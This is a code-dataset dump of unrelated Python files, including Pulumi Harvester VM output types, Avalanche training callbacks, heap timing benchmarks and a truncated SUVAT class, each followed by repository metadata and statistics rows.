pulumi.set(__self__, "volume_name", volume_name)
@property
@pulumi.getter
def name(self) -> str:
"""
A unique name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="accessMode")
def access_mode(self) -> Optional[str]:
return pulumi.get(self, "access_mode")
@property
@pulumi.getter(name="autoDelete")
def auto_delete(self) -> Optional[bool]:
return pulumi.get(self, "auto_delete")
@property
@pulumi.getter(name="bootOrder")
def boot_order(self) -> Optional[int]:
return pulumi.get(self, "boot_order")
@property
@pulumi.getter
def bus(self) -> Optional[str]:
return pulumi.get(self, "bus")
@property
@pulumi.getter(name="containerImageName")
def container_image_name(self) -> Optional[str]:
return pulumi.get(self, "container_image_name")
@property
@pulumi.getter(name="existingVolumeName")
def existing_volume_name(self) -> Optional[str]:
return pulumi.get(self, "existing_volume_name")
@property
@pulumi.getter(name="hotPlug")
def hot_plug(self) -> Optional[bool]:
return pulumi.get(self, "hot_plug")
@property
@pulumi.getter
def image(self) -> Optional[str]:
return pulumi.get(self, "image")
@property
@pulumi.getter
def size(self) -> Optional[str]:
return pulumi.get(self, "size")
@property
@pulumi.getter(name="storageClassName")
def storage_class_name(self) -> Optional[str]:
return pulumi.get(self, "storage_class_name")
@property
@pulumi.getter
def type(self) -> Optional[str]:
return pulumi.get(self, "type")
@property
@pulumi.getter(name="volumeMode")
def volume_mode(self) -> Optional[str]:
return pulumi.get(self, "volume_mode")
@property
@pulumi.getter(name="volumeName")
def volume_name(self) -> Optional[str]:
return pulumi.get(self, "volume_name")
@pulumi.output_type
class VirtualMachineNetworkInterface(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "interfaceName":
suggest = "interface_name"
elif key == "ipAddress":
suggest = "ip_address"
elif key == "macAddress":
suggest = "mac_address"
elif key == "networkName":
suggest = "network_name"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in VirtualMachineNetworkInterface. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
VirtualMachineNetworkInterface.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
VirtualMachineNetworkInterface.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
name: str,
interface_name: Optional[str] = None,
ip_address: Optional[str] = None,
mac_address: Optional[str] = None,
model: Optional[str] = None,
network_name: Optional[str] = None,
type: Optional[str] = None):
"""
:param str name: A unique name
"""
pulumi.set(__self__, "name", name)
if interface_name is not None:
pulumi.set(__self__, "interface_name", interface_name)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if mac_address is not None:
pulumi.set(__self__, "mac_address", mac_address)
if model is not None:
pulumi.set(__self__, "model", model)
if network_name is not None:
pulumi.set(__self__, "network_name", network_name)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def name(self) -> str:
"""
A unique name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="interfaceName")
def interface_name(self) -> Optional[str]:
return pulumi.get(self, "interface_name")
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[str]:
return pulumi.get(self, "ip_address")
@property
@pulumi.getter(name="macAddress")
def mac_address(self) -> Optional[str]:
return pulumi.get(self, "mac_address")
@property
@pulumi.getter
def model(self) -> Optional[str]:
return pulumi.get(self, "model")
@property
@pulumi.getter(name="networkName")
def network_name(self) -> Optional[str]:
return pulumi.get(self, "network_name")
@property
@pulumi.getter
def type(self) -> Optional[str]:
return pulumi.get(self, "type")
@pulumi.output_type
class GetVirtualMachineCloudinitResult(dict):
def __init__(__self__, *,
network_data: Optional[str] = None,
network_data_base64: Optional[str] = None,
network_data_secret_name: Optional[str] = None,
type: Optional[str] = None,
user_data: Optional[str] = None,
user_data_base64: Optional[str] = None,
user_data_secret_name: Optional[str] = None):
if network_data is not None:
pulumi.set(__self__, "network_data", network_data)
if network_data_base64 is not None:
pulumi.set(__self__, "network_data_base64", network_data_base64)
if network_data_secret_name is not None:
pulumi.set(__self__, "network_data_secret_name", network_data_secret_name)
if type is not None:
pulumi.set(__self__, "type", type)
if user_data is not None:
pulumi.set(__self__, "user_data", user_data)
if user_data_base64 is not None:
pulumi.set(__self__, "user_data_base64", user_data_base64)
if user_data_secret_name is not None:
pulumi.set(__self__, "user_data_secret_name", user_data_secret_name)
@property
@pulumi.getter(name="networkData")
def network_data(self) -> Optional[str]:
return pulumi.get(self, "network_data")
@property
@pulumi.getter(name="networkDataBase64")
def network_data_base64(self) -> Optional[str]:
return pulumi.get(self, "network_data_base64")
@property
@pulumi.getter(name="networkDataSecretName")
def network_data_secret_name(self) -> Optional[str]:
return pulumi.get(self, "network_data_secret_name")
@property
@pulumi.getter
def type(self) -> Optional[str]:
return pulumi.get(self, "type")
@property
@pulumi.getter(name="userData")
def user_data(self) -> Optional[str]:
return pulumi.get(self, "user_data")
@property
@pulumi.getter(name="userDataBase64")
def user_data_base64(self) -> Optional[str]:
return pulumi.get(self, "user_data_base64")
@property
@pulumi.getter(name="userDataSecretName")
def user_data_secret_name(self) -> Optional[str]:
return pulumi.get(self, "user_data_secret_name")
@pulumi.output_type
class GetVirtualMachineDiskResult(dict):
def __init__(__self__, *,
access_mode: str,
auto_delete: bool,
bus: str,
hot_plug: bool,
name: str,
storage_class_name: str,
volume_mode: str,
volume_name: str,
boot_order: Optional[int] = None,
container_image_name: Optional[str] = None,
existing_volume_name: Optional[str] = None,
image: Optional[str] = None,
size: Optional[str] = None,
type: Optional[str] = None):
"""
:param str name: A unique name
"""
pulumi.set(__self__, "access_mode", access_mode)
pulumi.set(__self__, "auto_delete", auto_delete)
pulumi.set(__self__, "bus", bus)
pulumi.set(__self__, "hot_plug", hot_plug)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "storage_class_name", storage_class_name)
pulumi.set(__self__, "volume_mode", volume_mode)
pulumi.set(__self__, "volume_name", volume_name)
if boot_order is not None:
pulumi.set(__self__, "boot_order", boot_order)
if container_image_name is not None:
pulumi.set(__self__, "container_image_name", container_image_name)
if existing_volume_name is not None:
pulumi.set(__self__, "existing_volume_name", existing_volume_name)
if image is not None:
pulumi.set(__self__, "image", image)
if size is not None:
pulumi.set(__self__, "size", size)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="accessMode")
def access_mode(self) -> str:
return pulumi.get(self, "access_mode")
@property
@pulumi.getter(name="autoDelete")
def auto_delete(self) -> bool:
return pulumi.get(self, "auto_delete")
@property
@pulumi.getter
def bus(self) -> str:
return pulumi.get(self, "bus")
@property
@pulumi.getter(name="hotPlug")
def hot_plug(self) -> bool:
return pulumi.get(self, "hot_plug")
@property
@pulumi.getter
def name(self) -> str:
"""
A unique name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="storageClassName")
def storage_class_name(self) -> str:
return pulumi.get(self, "storage_class_name")
@property
@pulumi.getter(name="volumeMode")
def volume_mode(self) -> str:
return pulumi.get(self, "volume_mode")
@property
@pulumi.getter(name="volumeName")
def volume_name(self) -> str:
return pulumi.get(self, "volume_name")
@property
@pulumi.getter(name="bootOrder")
def boot_order(self) -> Optional[int]:
return pulumi.get(self, "boot_order")
@property
@pulumi.getter(name="containerImageName")
def container_image_name(self) -> Optional[str]:
return pulumi.get(self, "container_image_name")
@property
@pulumi.getter(name="existingVolumeName")
def existing_volume_name(self) -> Optional[str]:
return pulumi.get(self, "existing_volume_name")
@property
@pulumi.getter
def image(self) -> Optional[str]:
return pulumi.get(self, "image")
@property
@pulumi.getter
def size(self) -> Optional[str]:
return pulumi.get(self, "size")
@property
@pulumi.getter
def type(self) -> Optional[str]:
return pulumi.get(self, "type")
@pulumi.output_type
class GetVirtualMachineNetworkInterfaceResult(dict):
def __init__(__self__, *,
interface_name: str,
ip_address: str,
mac_address: str,
name: str,
type: str,
model: Optional[str] = None,
network_name: Optional[str] = None):
"""
:param str name: A unique name
"""
pulumi.set(__self__, "interface_name", interface_name)
pulumi.set(__self__, "ip_address", ip_address)
pulumi.set(__self__, "mac_address", mac_address)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "type", type)
if model is not None:
pulumi.set(__self__, "model", model)
if network_name is not None:
pulumi.set(__self__, "network_name", network_name)
@property
@pulumi.getter(name="interfaceName")
def interface_name(self) -> str:
return pulumi.get(self, "interface_name")
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> str:
return pulumi.get(self, "ip_address")
@property
@pulumi.getter(name="macAddress")
def mac_address(self) -> str:
return pulumi.get(self, "mac_address")
@property
@pulumi.getter
def name(self) -> str:
"""
A unique name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def type(self) -> str:
return pulumi.get(self, "type")
@property
@pulumi.getter
def model(self) -> Optional[str]:
return pulumi.get(self, "model")
@property
@pulumi.getter(name="networkName")
def network_name(self) -> Optional[str]:
return pulumi.get(self, "network_name")
| 33.462712 | 150 | 0.612673 | 2,243 | 19,743 | 5.086045 | 0.056621 | 0.071353 | 0.063815 | 0.093268 | 0.838622 | 0.830207 | 0.824597 | 0.755698 | 0.740007 | 0.702402 | 0 | 0.004543 | 0.275338 | 19,743 | 589 | 151 | 33.519525 | 0.792829 | 0.018133 | 0 | 0.762004 | 1 | 0.006263 | 0.141279 | 0.025735 | 0 | 0 | 0 | 0 | 0 | 1 | 0.148225 | false | 0 | 0.010438 | 0.108559 | 0.300626 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 9 |
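The generated output classes above expose every field through a snake_case property getter; dict-style access with the original camelCase key still works but triggers __key_warning, which logs a hint to use the property instead. A minimal, hedged sketch of the intended access pattern (the disk values are hypothetical):

# Hedged sketch: constructing and reading one of the generated output types.
# The field values are hypothetical; only the access pattern matters.
from pulumi_harvester.outputs import VirtualMachineDisk

disk = VirtualMachineDisk(name="root-disk", size="20Gi", bus="virtio")
print(disk.name)        # "root-disk" -- preferred snake_case property access
print(disk.boot_order)  # None; unset optional fields default to None
# disk["bootOrder"] would log a warning suggesting the 'boot_order' getter.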
2b544ccdbeab8763c4f68da4243d9ccb033c0ebf | 149 | py | Python | texar/custom/__init__.py | lunayach/texar-pytorch | ac3e334e491f524dd01654b07af030fa20c88b34 | [
"Apache-2.0"
] | null | null | null | texar/custom/__init__.py | lunayach/texar-pytorch | ac3e334e491f524dd01654b07af030fa20c88b34 | [
"Apache-2.0"
] | null | null | null | texar/custom/__init__.py | lunayach/texar-pytorch | ac3e334e491f524dd01654b07af030fa20c88b34 | [
"Apache-2.0"
] | null | null | null | """
Custom modules in Texar
"""
from texar.custom.activation import *
from texar.custom.initializers import *
from texar.custom.optimizers import *
| 18.625 | 39 | 0.771812 | 19 | 149 | 6.052632 | 0.473684 | 0.234783 | 0.391304 | 0.365217 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.127517 | 149 | 7 | 40 | 21.285714 | 0.884615 | 0.154362 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
2b6ea728d291dcc4b621740603e4a9d56d652d3d | 2,521 | py | Python | avalanche/training/strategy_callbacks.py | lrzpellegrini/avalanche_pre_public | 522019a55ce08b92c1ec74b508a8ea6ae8751dfd | [
"MIT"
] | 12 | 2021-04-16T15:49:59.000Z | 2022-02-27T18:04:58.000Z | avalanche/training/strategy_callbacks.py | lrzpellegrini/avalanche_pre_public | 522019a55ce08b92c1ec74b508a8ea6ae8751dfd | [
"MIT"
] | null | null | null | avalanche/training/strategy_callbacks.py | lrzpellegrini/avalanche_pre_public | 522019a55ce08b92c1ec74b508a8ea6ae8751dfd | [
"MIT"
] | 2 | 2021-06-22T04:11:52.000Z | 2021-11-12T03:27:18.000Z | from abc import ABC
from typing import TypeVar, Generic
CallbackResult = TypeVar('CallbackResult')
class StrategyCallbacks(Generic[CallbackResult], ABC):
"""
Base class for all classes dealing with strategy callbacks. Implements all
the callbacks of the BaseStrategy with an empty function.
Subclasses must override the desired callbacks.
    The two main direct subclasses are :class:`StrategyPlugin` and
    :class:`StrategyLogger`. The first defines a common interface for all
    plugins.
"""
def __init__(self):
pass
def before_training(self, *args, **kwargs) -> CallbackResult:
pass
def before_training_exp(self, *args, **kwargs) -> CallbackResult:
pass
def adapt_train_dataset(self, *args, **kwargs) -> CallbackResult:
pass
def before_training_epoch(self, *args, **kwargs) -> CallbackResult:
pass
def before_training_iteration(self, *args, **kwargs) -> CallbackResult:
pass
def before_forward(self, *args, **kwargs) -> CallbackResult:
pass
def after_forward(self, *args, **kwargs) -> CallbackResult:
pass
def before_backward(self, *args, **kwargs) -> CallbackResult:
pass
def after_backward(self, *args, **kwargs) -> CallbackResult:
pass
def after_training_iteration(self, *args, **kwargs) -> CallbackResult:
pass
def before_update(self, *args, **kwargs) -> CallbackResult:
pass
def after_update(self, *args, **kwargs) -> CallbackResult:
pass
def after_training_epoch(self, *args, **kwargs) -> CallbackResult:
pass
def after_training_exp(self, *args, **kwargs) -> CallbackResult:
pass
def after_training(self, *args, **kwargs) -> CallbackResult:
pass
def before_eval(self, *args, **kwargs) -> CallbackResult:
pass
def adapt_eval_dataset(self, *args, **kwargs) -> CallbackResult:
pass
def before_eval_exp(self, *args, **kwargs) -> CallbackResult:
pass
def after_eval_exp(self, *args, **kwargs) -> CallbackResult:
pass
def after_eval(self, *args, **kwargs) -> CallbackResult:
pass
def before_eval_iteration(self, *args, **kwargs) -> CallbackResult:
pass
def before_eval_forward(self, *args, **kwargs) -> CallbackResult:
pass
def after_eval_forward(self, *args, **kwargs) -> CallbackResult:
pass
def after_eval_iteration(self, *args, **kwargs) -> CallbackResult:
pass
| 27.107527 | 78 | 0.656089 | 273 | 2,521 | 5.904762 | 0.21978 | 0.104218 | 0.208437 | 0.416873 | 0.735732 | 0.735732 | 0.735732 | 0.652605 | 0.198511 | 0.126551 | 0 | 0 | 0.235621 | 2,521 | 92 | 79 | 27.402174 | 0.836533 | 0.127727 | 0 | 0.462963 | 0 | 0 | 0.006472 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.462963 | false | 0.462963 | 0.037037 | 0 | 0.518519 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
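Because every hook above is an empty method, a concrete callback class only overrides the hooks it needs. A minimal, hedged sketch (the epoch-counting behavior is illustrative, not part of Avalanche; the import path is taken from this file's location):

# Illustrative subclass of StrategyCallbacks: override one hook and inherit
# the rest as no-ops.
from avalanche.training.strategy_callbacks import StrategyCallbacks

class EpochCounter(StrategyCallbacks[None]):
    def __init__(self):
        super().__init__()
        self.epochs = 0

    def after_training_epoch(self, *args, **kwargs) -> None:
        self.epochs += 1  # every other callback stays an empty no-op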
2b6ed6d561c7b1a53286f82c95d887e08ddd61f7 | 323 | py | Python | POP1/worksheets/recursion/ex05/test_ex05.py | silvafj/BBK-MSCCS-2017-18 | d97b0f8e7434d19a1a4006989c32c4c1deb93842 | [
"MIT"
] | 1 | 2021-12-29T19:38:56.000Z | 2021-12-29T19:38:56.000Z | POP1/worksheets/recursion/ex05/test_ex05.py | silvafj/BBK-MSCCS-2017-18 | d97b0f8e7434d19a1a4006989c32c4c1deb93842 | [
"MIT"
] | null | null | null | POP1/worksheets/recursion/ex05/test_ex05.py | silvafj/BBK-MSCCS-2017-18 | d97b0f8e7434d19a1a4006989c32c4c1deb93842 | [
"MIT"
] | 2 | 2021-04-08T22:58:03.000Z | 2021-04-09T01:16:51.000Z | from reverse import reverse
def test_a():
assert reverse("1 2 3 0") == "0 3 2 1"
def test_b():
assert reverse("8 7 2 3 1 4 5 0") == "0 5 4 1 3 2 7 8"
def test_c():
assert reverse("1 0") == "0 1"
def test_d():
assert reverse("0") == "0"
def test_e():
assert reverse("1 2 3 4 5 6 7 8 9 0") == "0 9 8 7 6 5 4 3 2 1"
| 19 | 63 | 0.569659 | 79 | 323 | 2.265823 | 0.265823 | 0.195531 | 0.234637 | 0.167598 | 0.178771 | 0 | 0 | 0 | 0 | 0 | 0 | 0.209205 | 0.260062 | 323 | 16 | 64 | 20.1875 | 0.539749 | 0 | 0 | 0 | 0 | 0 | 0.278638 | 0 | 0 | 0 | 0 | 0 | 0.454545 | 1 | 0.454545 | true | 0 | 0.090909 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
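The five tests above fully pin down reverse on space-separated token strings; a hedged sketch of one recursive implementation that satisfies them (the actual ex05 solution may be written differently):

# One recursive implementation consistent with the tests above.
def reverse(s: str) -> str:
    head, _, tail = s.partition(" ")
    if not tail:  # single token: nothing left to reverse
        return head
    return reverse(tail) + " " + head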
9952969db32253c61a8f4459cb3c98bab53109f8 | 14,762 | py | Python | test_xheap_time.py | srkunze/xheap | de98ecc5e009f9cd95aef84fd6202d8074df6f7d | [
"MIT"
] | 10 | 2016-01-31T06:00:44.000Z | 2021-08-11T09:46:04.000Z | test_xheap_time.py | srkunze/xheap | de98ecc5e009f9cd95aef84fd6202d8074df6f7d | [
"MIT"
] | 3 | 2016-02-02T20:02:48.000Z | 2018-04-10T00:30:29.000Z | test_xheap_time.py | srkunze/xheap | de98ecc5e009f9cd95aef84fd6202d8074df6f7d | [
"MIT"
] | 7 | 2016-01-31T04:40:37.000Z | 2019-07-16T13:36:38.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from timeit import repeat
class HeapTimeCase(object):
def time_init(self):
return [
'init',
(
'heapq',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from heapq import heapify;'
),
'heapify(values)',
1,
),
(
'Heap',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from xheap import Heap;'
),
'Heap(values)',
1,
),
(
'RemovalHeap',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from xheap import RemovalHeap;'
),
'RemovalHeap(values)',
1,
),
(
'SortedList',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from sortedcontainers import SortedList;'
),
'SortedList(values, load=100)',
1,
),
]
def time_pop(self):
return [
'pop',
(
'heapq',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from heapq import heapify, heappop;'
'heapify(values);'
),
'heappop(values)',
None,
),
(
'Heap',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from xheap import Heap;'
'heap = Heap(values);'
),
'heap.pop()',
None,
),
(
'RemovalHeap',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from xheap import RemovalHeap;'
'heap = RemovalHeap(values);'
),
'heap.pop()',
None,
),
(
'SortedList',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from sortedcontainers import SortedList;'
'heap = SortedList(values, load=100);'
),
'heap.pop(0)',
None,
),
]
def time_push(self):
return [
'push',
(
'heapq',
(
'import random;'
'random.seed(0);'
'values = list(range(0, {size} * 2, 2));'
'random.shuffle(values);'
'from heapq import heapify, heappush;'
'heap = list(values);'
'heapify(heap);'
'random.shuffle(values);'
'i = 0;'
),
'heappush(heap, values[i] + 1); i += 1',
None,
),
(
'Heap',
(
'import random;'
'random.seed(0);'
'values = list(range(0, {size} * 2, 2));'
'random.shuffle(values);'
'from xheap import Heap;'
'heap = Heap(values);'
'random.shuffle(values);'
'i = 0;'
),
'heap.push(values[i] + 1); i += 1',
None,
),
(
'RemovalHeap',
(
'import random;'
'random.seed(0);'
'values = list(range(0, {size} * 2, 2));'
'random.shuffle(values);'
'from xheap import RemovalHeap;'
'heap = RemovalHeap(values);'
'random.shuffle(values);'
'i = 0;'
),
'heap.push(values[i] + 1); i += 1',
None,
),
(
'SortedList',
(
'import random;'
'random.seed(0);'
'values = list(range(0, {size} * 2, 2));'
'random.shuffle(values);'
'from sortedcontainers import SortedList;'
'heap = SortedList(values, load=100);'
'random.shuffle(values);'
'i = 0;'
),
'heap.add(values[i] + 1); i += 1',
None,
),
]
class OrderHeapTimeCase(object):
def time_init(self):
return [
'init',
(
'heapq',
(
'import random;'
'random.seed(0);'
'values = [(-x, x) for x in range({size})];'
'random.shuffle(values);'
'from heapq import heapify;'
),
'heapify(values)',
1,
),
(
'OrderHeap',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from xheap import OrderHeap;'
),
'OrderHeap(values, key=lambda x: -x)',
1,
),
(
'XHeap',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from xheap import XHeap;'
),
'XHeap(values, key=lambda x: -x)',
1,
),
(
'SortedList',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from sortedcontainers import SortedList;'
),
'SortedList(values, key=lambda x: -x, load=100)',
1,
),
]
def time_pop(self):
return [
'pop',
(
'heapq',
(
'import random;'
'random.seed(0);'
'values = [(-x, x) for x in range({size})];'
'from heapq import heapify, heappop;'
'heapify(values);'
),
'heappop(values)[1]',
None,
),
(
'OrderHeap',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'from xheap import OrderHeap;'
'heap = OrderHeap(values, key=lambda x: -x);'
),
'heap.pop()',
None,
),
(
'XHeap',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'from xheap import XHeap;'
'heap = XHeap(values, key=lambda x: -x);'
),
'heap.pop()',
None,
),
(
'SortedList',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'from sortedcontainers import SortedList;'
'heap = SortedList(values, key=lambda x: -x, load=100);'
),
'heap.pop(0)',
None,
),
]
def time_push(self):
return [
'push',
(
'heapq',
(
'import random;'
'random.seed(0);'
'values = [(-x, x) for x in range(0, {size} * 2, 2)];'
'random.shuffle(values);'
'from heapq import heapify, heappush;'
'heap = list(values);'
'heapify(heap);'
'random.shuffle(values);'
'i = 0;'
),
'heappush(heap, (values[i][0] - 1, values[i][1] + 1)); i += 1',
None,
),
(
'OrderHeap',
(
'import random;'
'random.seed(0);'
'values = list(range(0, {size} * 2, 2));'
'random.shuffle(values);'
'from xheap import OrderHeap;'
'heap = OrderHeap(values, key=lambda x: -x);'
'random.shuffle(values);'
'i = 0;'
),
'heap.push(values[i] + 1); i += 1',
None,
),
(
'XHeap',
(
'import random;'
'random.seed(0);'
'values = list(range(0, {size} * 2, 2));'
'random.shuffle(values);'
'from xheap import XHeap;'
'heap = XHeap(values, key=lambda x: -x);'
'random.shuffle(values);'
'i = 0;'
),
'heap.push(values[i] + 1); i += 1',
None,
),
(
'SortedList',
(
'import random;'
'random.seed(0);'
'values = list(range(0, {size} * 2, 2));'
'random.shuffle(values);'
'from sortedcontainers import SortedList;'
'heap = SortedList(values, key=lambda x: -x, load=100);'
'random.shuffle(values);'
'i = 0;'
),
'heap.add(values[i] + 1); i += 1',
None,
),
]
class RemovalHeapTimeCase(object):
def time_remove(self):
return [
'remove',
(
'RemovalHeap',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from xheap import RemovalHeap;'
'heap = RemovalHeap((-x, x) for x in values);'
'i = 0;'
'random.shuffle(values);'
),
(
'heap.remove((-values[i], values[i]));'
'i += 1;'
),
None,
),
(
'XHeap',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from xheap import XHeap;'
'heap = XHeap(values, key=lambda x: -x);'
'i = 0;'
'random.shuffle(values);'
),
(
'heap.remove(values[i]);'
'i += 1;'
),
None,
),
(
'SortedList',
(
'import random;'
'random.seed(0);'
'values = list(range({size}));'
'random.shuffle(values);'
'from sortedcontainers import SortedList;'
'heap = SortedList(values, key=lambda x: -x, load=100);'
'i = 0;'
'random.shuffle(values);'
),
(
'heap.remove(values[i]);'
'i += 1;'
),
None,
),
]
initial_sizes = [10**3, 10**4, 10**5, 10**6]
repetitions = 5
def perform_time_configs(configs):
for _, setup, stmt, number in configs:
try:
yield [min(repeat(stmt.format(size=size), setup.format(size=size), number=(number or size), repeat=repetitions)) for size in initial_sizes]
except ImportError as exc:
pass
for htc in (HeapTimeCase(), OrderHeapTimeCase(), RemovalHeapTimeCase()):
config_methods = [getattr(htc, method) for method in dir(htc) if method.startswith('time_') and callable(getattr(htc, method))]
configs_list = [config_method() for config_method in config_methods]
align_label = max(len(cs[0]) for cs in configs_list)
align_module = max(len(c[0]) for cs in configs_list for c in cs)
for configs in configs_list:
label, configs = configs[0], configs[1:]
results = list(perform_time_configs(configs))
baseline_config = configs[0]
baseline_results = results[0]
for i, (config, results) in enumerate(zip(configs, results)):
printed_label = (label if i == 0 else '').ljust(align_label)
print(printed_label, config[0].ljust(align_module), ' '.join('{:5.2f} ({:5.2f}x)'.format(result*1000, result/baseline_result) for result, baseline_result in zip(results, baseline_results)))
print('--------------------------------------------------------------------')
print('--------------------------------------------------------------------')
| 32.515419 | 201 | 0.34013 | 1,057 | 14,762 | 4.71334 | 0.099338 | 0.088719 | 0.129667 | 0.119229 | 0.791449 | 0.788438 | 0.770373 | 0.768567 | 0.764954 | 0.739663 | 0 | 0.020881 | 0.526351 | 14,762 | 453 | 202 | 32.587196 | 0.691648 | 0.001423 | 0 | 0.754673 | 0 | 0.004673 | 0.347988 | 0.067033 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018692 | false | 0.002336 | 0.133178 | 0.016355 | 0.175234 | 0.009346 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
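Each benchmark entry above is a (label, setup, stmt, number) tuple with {size} interpolated per run; a hedged sketch of timing one such entry by hand, mirroring what perform_time_configs does for a single size (timings are machine-dependent):

# Stand-alone timing of one (label, setup, stmt, number) entry.
from timeit import repeat

setup = (
    'import random;'
    'random.seed(0);'
    'values = list(range({size}));'
    'random.shuffle(values);'
    'from heapq import heapify;'
)
stmt = 'heapify(values)'
size = 10 ** 4
best = min(repeat(stmt.format(size=size), setup.format(size=size),
                  number=1, repeat=5))
print('heapify %d: %.2f ms' % (size, best * 1000))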
9967eacf0b6c8e7e6cf1510324705aaeaae06e1f | 247 | py | Python | hodolbot/controllers/__init__.py | solar0037/hodolbot | f758375efce2dede58d920d41cab4a8ad38d1d58 | [
"MIT"
] | null | null | null | hodolbot/controllers/__init__.py | solar0037/hodolbot | f758375efce2dede58d920d41cab4a8ad38d1d58 | [
"MIT"
] | 3 | 2021-08-02T01:59:04.000Z | 2021-08-02T01:59:15.000Z | hodolbot/controllers/__init__.py | solar0037/hodolbot | f758375efce2dede58d920d41cab4a8ad38d1d58 | [
"MIT"
] | null | null | null | from hodolbot.controllers.covid19 import covid19_handler
from hodolbot.controllers.ranking import programming_handler, anime_handler
from hodolbot.controllers.stock import stock_handler
from hodolbot.controllers.developer import developer_handler
| 49.4 | 75 | 0.894737 | 30 | 247 | 7.2 | 0.366667 | 0.222222 | 0.425926 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017391 | 0.068826 | 247 | 4 | 76 | 61.75 | 0.921739 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
5a91b155529000afffed13a83fae9357a753e598 | 11,379 | py | Python | src/Suvat.py | rustedorc/Toms-Calc | 263a055cf967e6e9e077e5d300c581c20c8e2f52 | [
"MIT"
] | 3 | 2020-11-25T19:25:22.000Z | 2020-11-26T22:18:20.000Z | src/Suvat.py | rustedorc/SUVAT | 263a055cf967e6e9e077e5d300c581c20c8e2f52 | [
"MIT"
] | null | null | null | src/Suvat.py | rustedorc/SUVAT | 263a055cf967e6e9e077e5d300c581c20c8e2f52 | [
"MIT"
] | null | null | null | from math import sqrt
class SUVAT :
'''
v = u + at DONE
v**2 = u**2 + 2as DONE
s = ut + (1/2)at**2 DONE KINDA
s = vt - (1/2)at**2 DONE KINDA
s = (1/2)(u + v)t DONE KINDA
Find logic GETTING THERE
'''
def __init__(self, S=None, U=None, V=None, A=None, T=None) :
self.S = S
self.U = U
self.V = V
self.A = A
self.T = T
def v_equals_u_plus_at(self) :
